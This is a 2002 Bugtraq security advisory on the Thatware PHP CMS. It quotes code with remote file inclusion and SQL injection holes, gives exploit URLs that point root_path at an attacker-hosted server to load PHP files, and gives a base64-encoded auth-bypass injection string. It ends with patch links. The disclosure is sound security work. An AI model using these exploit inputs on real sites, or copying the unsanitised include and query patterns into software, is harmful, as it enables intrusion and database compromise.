[28064] in bugtraq
Thatware (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Mon Dec 2 11:58:02 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 01 Dec 2002 19:35:11 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F17EiRZiUivZH0BbDgd00016dc9@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Versions : ? -> 0.3 -> 0.5.3
Website : http://www.thatware.org
Problems :
- Include file
- SQL Injection
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
artlist.php (v0.5.2, 0.5.3) :
-------------------------------------
include $root_path.'thatfile.php';
-------------------------------------
config.php (v? -> 0.3 -> 0.5.3) :
-------------------------------------
include $root_path."db_settings.php";
-------------------------------------
thatfile.php (v? -> 0.3 -> 0.5.2) :
------------------------------------------------------------------------
if (!IsSet($thatfile)) {
include($root_path."config.php");
if (!IsSet($translation_set)) {
include $root_path."messages.$language.php"; } #Translation module, even for
english needed!
------------------------------------------------------------------------
auth.inc.php (v? -> 0.3 -> 0.5.0) :
------------------------------------------------------------------------
$admintest = 0;
$mod_ok = 0;
$moderator = 0;
if(isset($user)) {
if (!$thatfile) include("thatfile.php");
$admin = base64_decode($user);
$admin = explode(":", $admin);
if (empty($admin[0]) || empty($admin[2])) exit;
$aid = $admin[1];
dbconnect();
$result=mysql_query("select rights from users where uid='$admin[0]' and
pass='$admin[2]'");
if(!$result) {
echo "Oh oh... select from database failed for admin check";
exit;
} else {
list($auth_rights)=mysql_fetch_row($result);
$auth_rights=explode(",",$auth_rights);
if (!empty($auth_rights)) {
$admintest=1;
if (inarray($auth_rights, "4")||inarray($auth_rights, "1")) {
$moderator=1;
$mod_ok=1;
}
}
}
}
------------------------------------------------------------------------
Exploits :
°°°°°°°°°°
v0.5.2, 0.5.3 :
http://[target]/artlist.php?root_path=http://[attacker]/
with
http://[attacker]/thatfile.php
v? -> 0.3 -> 0.5.3 :
http://[target]/config.php?root_path=http://[attacker]/
with
http://[attacker]/db_settings.php
v? -> 0.3 -> 0.5.2 :
http://[target]/thatfile.php?root_path=http://[attacker]/&language=1
with
http://[attacker]/config.php
and
http://[attacker]/messages.1.php
v? -> 0.3 -> 0.5.0 :
http://[target]/[NeedToBeAuth].php?user=JyBPUiAnJz0nOjE6JyBPUiAnJz0n
( base64_decode(JyBPUiAnJz0nOjE6JyBPUiAnJz0n) == ' OR ''=':1:' OR ''=')
Patchs :
°°°°°°°°
0.5.3:
http://www.phpsecure.org/patch/dl.php?id=47
0.5.2:
http://www.phpsecure.org/patch/dl.php?id=51
0.5.0:
http://www.phpsecure.org/patch/dl.php?id=50
0.4.5:
http://www.phpsecure.org/patch/dl.php?id=52
0.4.4:
http://www.phpsecure.org/patch/dl.php?id=49
0.4.3:
http://www.phpsecure.org/patch/dl.php?id=48
0.4.2:
http://www.phpsecure.org/patch/dl.php?id=53
0.4.1:
http://www.phpsecure.org/patch/dl.php?id=54
0.4:
http://www.phpsecure.org/patch/dl.php?id=55
0.3:
http://www.phpsecure.org/patch/dl.php?id=56
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/Thatware.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FThatware.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
